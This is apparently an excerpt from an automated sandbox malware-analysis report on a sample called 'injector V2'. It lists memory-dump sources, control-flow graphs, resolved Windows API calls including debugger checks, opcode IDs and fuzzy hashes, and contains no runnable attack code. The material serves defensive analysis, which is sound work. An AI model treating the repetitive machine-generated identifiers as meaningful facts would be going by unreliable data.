                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastThread__dosmaperr
                                                                          • String ID:
                                                                          • API String ID: 2744730728-0
                                                                          • Opcode ID: ff42be546b60fe3c9043301d9fdc3ab4d9ff7ea0b72d6d96ab63623efe81d8ab
                                                                          • Instruction ID: e5728e700984e18a598f1892883abf90f3a1c10e8cb7ce670ffc5bb039f903d8
                                                                          • Opcode Fuzzy Hash: ff42be546b60fe3c9043301d9fdc3ab4d9ff7ea0b72d6d96ab63623efe81d8ab
                                                                          • Instruction Fuzzy Hash: 54017172680209AFDF1D9FA0DC15AEF3BA6EF40764F104058F801962D0DBB0DE60DB94

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000002,?,006070B1,006083A0,006083A0,?,00000002,F8F81887,006083A0,00000002), ref: 00607000
                                                                          • TerminateProcess.KERNEL32(00000000,?,006070B1,006083A0,006083A0,?,00000002,F8F81887,006083A0,00000002), ref: 00607007
                                                                          • ExitProcess.KERNEL32 ref: 00607019
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 883940a37598c61d8ebf153205062fd0db2de13a47a93f0628470de9623ed820
                                                                          • Instruction ID: 89923c213c0ba5d7f2098e3900709d3e75fa2cd31f64cef0d98b5b6c1917ddb9
                                                                          • Opcode Fuzzy Hash: 883940a37598c61d8ebf153205062fd0db2de13a47a93f0628470de9623ed820
                                                                          • Instruction Fuzzy Hash: 10D09231444109BFDF552FA1EC1D8CE3FABAF44351B08D015B9098A1B1CB35EDAADBA4

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 113 60a732-60a737 114 60a739-60a751 113->114 115 60a753-60a757 114->115 116 60a75f-60a768 114->116 115->116 117 60a759-60a75d 115->117 118 60a77a 116->118 119 60a76a-60a76d 116->119 121 60a7d4-60a7d8 117->121 120 60a77c-60a789 GetStdHandle 118->120 122 60a776-60a778 119->122 123 60a76f-60a774 119->123 124 60a7b6-60a7c8 120->124 125 60a78b-60a78d 120->125 121->114 126 60a7de-60a7e1 121->126 122->120 123->120 124->121 128 60a7ca-60a7cd 124->128 125->124 127 60a78f-60a798 GetFileType 125->127 127->124 129 60a79a-60a7a3 127->129 128->121 130 60a7a5-60a7a9 129->130 131 60a7ab-60a7ae 129->131 130->121 131->121 132 60a7b0-60a7b4 131->132 132->121
                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0060A621,0061A088,0000000C), ref: 0060A77E
                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0060A621,0061A088,0000000C), ref: 0060A790
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandleType
                                                                          • String ID:
                                                                          • API String ID: 3000768030-0
                                                                          • Opcode ID: e49d0c7595197da372d782bb466157b041ea047f07b601630569dadec3cdc678
                                                                          • Instruction ID: 3e31e440cf6a31647daf1ab0924ec41583bcc3aa8501e66244ead3e809ec89c1
                                                                          • Opcode Fuzzy Hash: e49d0c7595197da372d782bb466157b041ea047f07b601630569dadec3cdc678
                                                                          • Instruction Fuzzy Hash: 1B1129795447414ACB388E7ECC886A77AB7AB563B0B38871AD1B6876F1C234D846D243

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32(00619D20,0000000C), ref: 00606E13
                                                                          • ExitThread.KERNEL32 ref: 00606E1A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorExitLastThread
                                                                          • String ID:
                                                                          • API String ID: 1611280651-0
                                                                          • Opcode ID: 9273cea1359a8cd5b1dec7242cdb32f0899299b399a183372a4f3f7670bb74e5
                                                                          • Instruction ID: 639bf852f513e4bd1a7e86a61112fd64e867906a323e59d9116198dbe5d79728
                                                                          • Opcode Fuzzy Hash: 9273cea1359a8cd5b1dec7242cdb32f0899299b399a183372a4f3f7670bb74e5
                                                                          • Instruction Fuzzy Hash: BEF08C70A80605AFDB09AFB0C85AAAF3BA7EF00700F14854EF002972D2DB709911CBA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 153 60b0cb-60b0d4 154 60b103-60b104 153->154 155 60b0d6-60b0e9 RtlFreeHeap 153->155 155->154 156 60b0eb-60b102 GetLastError call 60b7a0 call 60b757 155->156 156->154
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,0060BC39,?,00000000,?,?,0060BB55,?,00000007,?,?,0060C16E,?,?), ref: 0060B0E1
                                                                          • GetLastError.KERNEL32(?,?,0060BC39,?,00000000,?,?,0060BB55,?,00000007,?,?,0060C16E,?,?), ref: 0060B0EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 485612231-0
                                                                          • Opcode ID: 05e8e65d62c54a59a502f731f4d7f00bb072440191ce1dabcf6f96e9da325ab7
                                                                          • Instruction ID: 3b5f620a3ffac7b2bcaed55e7159db2d8cb074447e49f6768cabae9957e1f32a
                                                                          • Opcode Fuzzy Hash: 05e8e65d62c54a59a502f731f4d7f00bb072440191ce1dabcf6f96e9da325ab7
                                                                          • Instruction Fuzzy Hash: 8CE08C32580208ABCB192FA0FC09BDA3A9FAB84751F04A065F608861A1CB708950CB98

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 238 603b60-603be5 call 5fe940 call 603cc0 call 603dc0 call 606ce6 246 603bea-603bf7 238->246 247 603bfe-603c0c 246->247 248 603c12-603c1f 247->248 249 603c55-603c6b 247->249 252 603c84-603c95 call 60441d 248->252 253 603c25-603c32 248->253 251 603cb5 249->251 251->247 257 603c9a-603cb2 call 603e30 call 604241 252->257 256 603c38-603c45 253->256 253->257 260 603c70-603c7f call 603de0 256->260 261 603c4b-603c50 256->261 260->251 261->251
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d5423aba5b85dec8aebf114e6cded1a475a53ec1a84bd7b75e0df2c0d3a23d92
                                                                          • Instruction ID: 51aab3032d35d61e655ef71a9cc28e3a15da399c54b37b43f3ed9287d15a85db
                                                                          • Opcode Fuzzy Hash: d5423aba5b85dec8aebf114e6cded1a475a53ec1a84bd7b75e0df2c0d3a23d92
                                                                          • Instruction Fuzzy Hash: C131F4B0D442198BDB08DFA9C5946AEBBF6FF48301F10842EE456EB390DB359A05CF55

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 268 609e9e-609ec8 269 609eca-609ecc 268->269 270 609ece-609ed0 268->270 271 609f1f-609f22 269->271 272 609ed2-609ed4 270->272 273 609ed6-609edd call 609dd3 270->273 272->271 275 609ee2-609ee6 273->275 276 609f05-609f1c 275->276 277 609ee8-609ef6 GetProcAddress 275->277 279 609f1e 276->279 277->276 278 609ef8-609f03 call 606ad0 277->278 278->279 279->271
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7c2913208265aec74a130cc34b940ccd1f65965af0d64dd754759090f658618c
                                                                          • Instruction ID: fb974d20338cf70ffbfaa17e31ffedcda61ca9f5fad421888ace8244c394b110
                                                                          • Opcode Fuzzy Hash: 7c2913208265aec74a130cc34b940ccd1f65965af0d64dd754759090f658618c
                                                                          • Instruction Fuzzy Hash: A601F5336442169BDB0A8F69EC40A9777ABFBC532072C9029F904CB2D6EB30D80187E4

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: CreateElliptic
                                                                          • String ID:
                                                                          • API String ID: 1611293138-0
                                                                          • Opcode ID: ed0f63bc439ae1df1e89522c6e8466343d0d01846d10244772c6e37f2a37632b
                                                                          • Instruction ID: 0a6f6c20ffd8e2da6c8816ea4df61c36c5397c33cc0b363a0cea75b53ad62a81
                                                                          • Opcode Fuzzy Hash: ed0f63bc439ae1df1e89522c6e8466343d0d01846d10244772c6e37f2a37632b
                                                                          • Instruction Fuzzy Hash: A511D6B0D002099BDB04EFA8C5597AEBBF5FF88304F40882DD855A7350EB786644CB91

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 291 60bc45-60bc51 292 60bc83-60bc8e call 60b757 291->292 293 60bc53-60bc55 291->293 300 60bc90-60bc92 292->300 294 60bc57-60bc58 293->294 295 60bc6e-60bc7f RtlAllocateHeap 293->295 294->295 298 60bc81 295->298 299 60bc5a-60bc61 call 608327 295->299 298->300 299->292 303 60bc63-60bc6c call 607207 299->303 303->292 303->295
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,006041E0,?,?,00601007,?,005FFAB5), ref: 0060BC77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: c93175f7b281ee196f3fa48f4a7038f6d3ec03f4cf3d0eee58ba05a2fcb2a433
                                                                          • Instruction ID: 515b0f45dfbcd6dba043a3fcb36818ab850376d5833dc64052bef478c4920520
                                                                          • Opcode Fuzzy Hash: c93175f7b281ee196f3fa48f4a7038f6d3ec03f4cf3d0eee58ba05a2fcb2a433
                                                                          • Instruction Fuzzy Hash: 5FE0E5355C065157F72D2661DC05BEF3A4B9F817A0F08F121BC14962D0CFA0DC01C2E8
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00604CB6
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00604CC4
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00604CD5
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00604CE6
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00604CF7
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00604D08
                                                                          • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00604D19
                                                                          • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00604D2A
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00604D3B
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00604D4C
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00604D5D
                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00604D6E
                                                                          • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00604D7F
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00604D90
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00604DA1
                                                                          • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00604DB2
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00604DC3
                                                                          • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00604DD4
                                                                          • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00604DE5
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00604DF6
                                                                          • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00604E07
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00604E18
                                                                          • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00604E29
                                                                          • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00604E3A
                                                                          • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00604E4B
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00604E5C
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00604E6D
                                                                          • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00604E7E
                                                                          • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00604E8F
                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00604EA0
                                                                          • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00604EB1
                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00604EC2
                                                                          • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00604ED3
                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00604EE4
                                                                          • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00604EF5
                                                                          • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00604F06
                                                                          • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00604F17
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00604F28
                                                                          • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00604F39
                                                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00604F4A
                                                                          • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00604F5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                          • API String ID: 667068680-295688737
                                                                          • Opcode ID: 386a28745b337e0e84bb090383977d3a84e2e2090bec2c1bcffd76ff4af7bb0b
                                                                          • Instruction ID: 2d4544639c0fabbb2334cd06875d6fac6bfdb0125b7a98165589cac8d6c21863
                                                                          • Opcode Fuzzy Hash: 386a28745b337e0e84bb090383977d3a84e2e2090bec2c1bcffd76ff4af7bb0b
                                                                          • Instruction Fuzzy Hash: CD613575996350ABE7406FF5EC5D8CA3FEBAB0971230EE817B101D3260DBB451828BB5
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FCF90
                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 005FD216
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: Cpp_errorCurrentThreadThrow_std::_
                                                                          • String ID:
                                                                          • API String ID: 350343453-0
                                                                          • Opcode ID: e6b7c7d14fbca21d0e79fd8eea4e97c9bbf768a521a47d06a08dc5c1d137c173
                                                                          • Instruction ID: 263d024553474c50fac00b954fc2af60708860f46fe9694a3196f39d15348260
                                                                          • Opcode Fuzzy Hash: e6b7c7d14fbca21d0e79fd8eea4e97c9bbf768a521a47d06a08dc5c1d137c173
                                                                          • Instruction Fuzzy Hash: 4AF10872E505144FEB008A7CC9A83EF6FE79B66330F2A5729DA745B7D2D62B04098F50
                                                                          APIs
                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0060C8CB
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0060C9BF
                                                                          • FindClose.KERNEL32(00000000), ref: 0060C9FE
                                                                          • FindClose.KERNEL32(00000000), ref: 0060CA31
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFile$FirstNext
                                                                          • String ID:
                                                                          • API String ID: 1164774033-0
                                                                          • Opcode ID: 45699df9389331cec0b14bccaf363f99abe2f30474594625c36fa51b8c041b3a
                                                                          • Instruction ID: c7169166f64defaf13fef8eb39117115f6dd0b431fa03a5c8cb431edf1e4046d
                                                                          • Opcode Fuzzy Hash: 45699df9389331cec0b14bccaf363f99abe2f30474594625c36fa51b8c041b3a
                                                                          • Instruction Fuzzy Hash: 7771C571D8511C5EDF28EF288C99AEFBBBAAF45310F1482D9E049A3291DB304E859F54
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00605450
                                                                          • IsDebuggerPresent.KERNEL32 ref: 0060551C
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0060553C
                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00605546
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1716401918.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1716387436.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716421125.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716435456.000000000061B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716448973.000000000061C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716461316.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1716475684.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                          • String ID:
                                                                          • API String ID: 254469556-0
                                                                          • Opcode ID: f98a11935ad563c2ab333d0adedeea3dd827a648902dfbe8c7a769d64f6ac246
                                                                          • Instruction ID: 536bdf5355725d5218292da1f140347a6c255d01c44a91b0c3a774b3ce24b9eb
                                                                          • Opcode Fuzzy Hash: f98a11935ad563c2ab333d0adedeea3dd827a648902dfbe8c7a769d64f6ac246
                                                                          • Instruction Fuzzy Hash: 4E311875D452189BDF11DFA4D9897CEBBF9BF08304F1080AAE40DAB290EB709A85CF55
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00607EC2
